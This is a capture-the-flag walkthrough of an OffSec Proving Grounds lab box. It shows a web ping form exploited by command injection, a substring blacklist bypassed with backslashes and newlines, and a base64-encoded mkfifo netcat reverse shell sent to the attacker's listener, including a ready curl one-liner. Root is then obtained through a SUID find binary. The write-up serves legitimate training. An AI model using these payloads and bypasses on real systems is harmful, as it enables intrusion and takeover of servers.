NoName OffSec Walkthrough

NoName is an intermediate-level box designed by OffSec, available on the OffSec Proving Grounds Play platform.


NoName may appear easy, but not everything is always straightforward. Only local.txt and proof.txt are valid flags.

Footprinting

Open ports

Nmap SYN scan:

kali@kali:~$ sudo nmap -sS -p- -Pn -v10 -oA syn_full 192.168.207.15
Discovered open port 80/tcp on 192.168.207.15

NSE scan:

kali@kali:~$ sudo nmap -sC -sV -p80 -Pn -v10 -oA nse 192.168.207.15
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)

HTTP

The main page serves a form that asks for an IP address:

>>>
POST /index.php HTTP/1.1
Host: 192.168.207.15

box=fake+query&submitt=submit

<<<
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>

Fake ping executed

However, that is a fake query box, as the IP input is not processed. Enumeration using ffuf reveals an admin directory:

kali@kali:~$ ffuf -v -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.207.15/FUZZ -t 50 -fc 404,403 -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"http://192.168.207.15/
"http://192.168.207.15/"
"http://192.168.207.15/."
"http://192.168.207.15/admin"
"http://192.168.207.15/index.php"

This directory holds four images, and exiftool finds nothing sensitive in their metadata:

kali@kali:~$ wget -r http://192.168.207.15/admin
kali@kali:~$ ls ./192.168.207.15
ctf-01.jpg  haclabs.jpeg  new.jpg  Short.png
kali@kali:~$ exiftool ./192.168.207.15/*

Steganographic message

Looking closer at that admin page, a passphrase is hidden in an HTML comment at the very bottom of the response:

>>>
GET /admin HTTP/1.1
Host: 192.168.207.15

<<<
<html>
  <body style="background-color:Gainsboro;text-align:center">
  <h3 text-align:center>HacLabs directory of gallery.</h3>
    <img src="new.jpg" height="200" width="200">
    <br>
    <img src="ctf-01.jpg" height="200" width="200">
    <br>
    <img src="haclabs.jpeg" height="200" width="200">
    <br>
    <img src="Short.png" height="200" width="200">
  </body>
</html>


[...]


<!--passphrase:harder-->

What can be done with that passphrase? Is a file hidden inside one of the images? steghide only handles JPEG, BMP, WAV and AU files, so the PNG can be ruled out; haclabs.jpeg is the one that accepts the passphrase:

kali@kali:~$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".

Yup!

kali@kali:~$ cat imp.txt
c3VwZXJhZG1pbi5waHA=

kali@kali:~$ base64 -d imp.txt
superadmin.php

This superadmin.php contains a ping feature (which is real this time!):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=127.0.0.1&submitt=Submit+Query

<<<
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2030ms
rtt min/avg/max/mdev = 0.015/0.023/0.029/0.008 ms

OS Command Injection

The output is identical to running the same ping locally, which suggests the IP is passed straight to a shell command:

kali@kali:~$ ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.013 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2036ms
rtt min/avg/max/mdev = 0.013/0.037/0.060/0.019 ms

A time-based probe with the pipe symbol immediately confirms command injection: the response takes about 10 seconds (Burp shows the response time in milliseconds):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=|sleep+10&submitt=Submit+Query

<<<
[10,452millis]

Note that the injection doesn’t need to be blind, as the output is returned in the response:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=|id&submitt=Submit+Query

<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)

This also confirms that the query form in index.php was a rabbit hole: its source never uses the submitted input:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0acat+index.php&submitt=Submit+Query

<<<
<?php
  if (isset($_POST['submitt']))
  {
    echo "Fake ping executed";
  }
?>

Getting a reverse shell is not as easy, though, because some strings are filtered, such as nc and & (URL-encoded %26):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0asleep+2%26&submitt=Submit+Query

<<<
[14millis]

Note that a line feed (\n, URL-encoded %0a) also works to inject the next command, since it ends the ping line and starts a new one.

Here, the injected sleep was not executed: the response came back in 14 ms, not 2 seconds. Dumping the source of superadmin.php through the same injection shows why. The filtered patterns are array(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"), and the command only runs when none of them occurs in the input (str_replace strips them, and strcmp then checks that nothing changed):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0acat+superadmin.php&submitt=Submit+Query

<<<
<?php
   if (isset($_POST['submitt']))
{
       $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
       $pinged=$_POST['pinger'];
       $newStr = str_replace($word, "", $pinged);
       if(strcmp($pinged, $newStr) == 0)
        {
            $flag=1;
        }
       else
        {
           $flag=0;
        }
}

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>

Getting a reverse shell with nc looks harder than it is. The check is a plain substring match on the decoded field value, performed before the shell ever sees it, so anything the shell resolves afterwards gets through. A backslash inside a word is one example: the shell discards it, but it breaks the substring match, so l\s runs as ls:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0al\s%0a&submitt=Submit+Query

<<<
Short.png
admin
ctf-01.jpg
haclabs.jpeg
index.php
new.jpg
superadmin.php

The same trick turns nc into n\c, and the listener receives a connection:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0ash|n\c++192.168.49.207+48590&submitt=Submit+Query

<<<
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38142

The connection arrives, but nothing typed into the listener is executed:

$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38144
id
ls
whoami
echo plz

That is expected from the way sh|n\c host port is wired: only sh's stdout is connected to nc; sh's stdin is whatever the web server gave it, and whatever the listener sends is written to nc's stdout on the target, never to sh. The classic mkfifo shell closes that loop (nc's output goes into the fifo, cat feeds it to sh -i, and sh's output is piped back into nc), but it contains /, ;, & and nc, which are all filtered, so it has to be hidden in base64 and decoded on the target:

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.207 48590 >/tmp/f' |base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu
NDkuMjA3IDQ4NTkwID4vdG1wL2YK

Note that base64 wraps its output at 76 columns, so the encoded blob contains a newline; it must be URL-encoded as %0a in the request body (base64 -d ignores it when decoding), or avoided altogether with base64 -w0. Check the blob itself against the filter too: the base64 alphabet contains /, and strings such as nc, ls or bin can show up in it by chance. This one is clean:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query

<<<
$ nc -nlvp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38194
sh: 0: can't access tty; job control turned off
$ whoami
www-data

The same request as a curl one-liner, to be sent with the listener already running:

$ curl -X POST -d "pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query" http://192.168.207.15/superadmin.php

Local privilege escalation

local.txt

The users are:

$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash
yash:x:1001:1001:,,,:/home/yash:/bin/bash

The first flag is in yash's home directory:

$ cd /home/yash

$ ls
flag1.txt
local.txt

$ cat *
Due to some security issues,I have saved haclabs password in a hidden file.

95[...]e6
proof.txt

Following that hint, let's look for haclabs's password. Nothing interesting in the home directory, though:

$ cd /home/haclabs

$ ls -la
total 80
drwxr-xr-x 16 haclabs haclabs 4096 Mar 16  2020 .
drwxr-xr-x  4 root    root    4096 Jan 27  2020 ..
-rw-------  1 haclabs haclabs 2576 Jan 30  2020 .ICEauthority
-rw-r--r--  1 root    root       0 Mar 16  2020 .bash_history
-rw-r--r--  1 haclabs haclabs 3771 Jan 27  2020 .bashrc
drwx------ 13 haclabs haclabs 4096 Feb  9  2020 .cache
drwx------ 11 haclabs haclabs 4096 Jan 27  2020 .config
drwx------  3 haclabs haclabs 4096 Jan 27  2020 .gnupg
drwx------  3 haclabs haclabs 4096 Jan 27  2020 .local
drwx------  5 haclabs haclabs 4096 Jan 27  2020 .mozilla
-rw-r--r--  1 haclabs haclabs  807 Jan 27  2020 .profile
drwx------  2 haclabs haclabs 4096 Jan 27  2020 .ssh
-rw-r--r--  1 haclabs haclabs    0 Jan 27  2020 .sudo_as_admin_successful
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Desktop
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Documents
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Downloads
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Music
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Pictures
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Public
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Templates
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Videos
-rw-r--r--  1 root    root     152 Jan 30  2020 flag2.txt

Is there anything interesting in flag2.txt?

$ cat flag2.txt
I am flag2

           ---------------               ----------------


                               --------

Nope :/ Running linpeas, I realized that hunting for haclabs's password was a rabbit hole. Indeed, I had forgotten to look for root SUID binaries!

                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid

-rwsr-xr-x 1 root root 233K Nov  5  2017 /usr/bin/find

find -exec runs the given command with find's effective uid, here root, and sh -p keeps that effective uid instead of resetting it to the real one. That gives a root shell and the last flag:

$ find . -exec /bin/sh -p \; -quit

$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

$ ls /root
flag3.txt
proof.txt

$ cat /root/*
Your flag is in another file...
41[...]51

Finally, this lab is solved. See you in the next one ;)
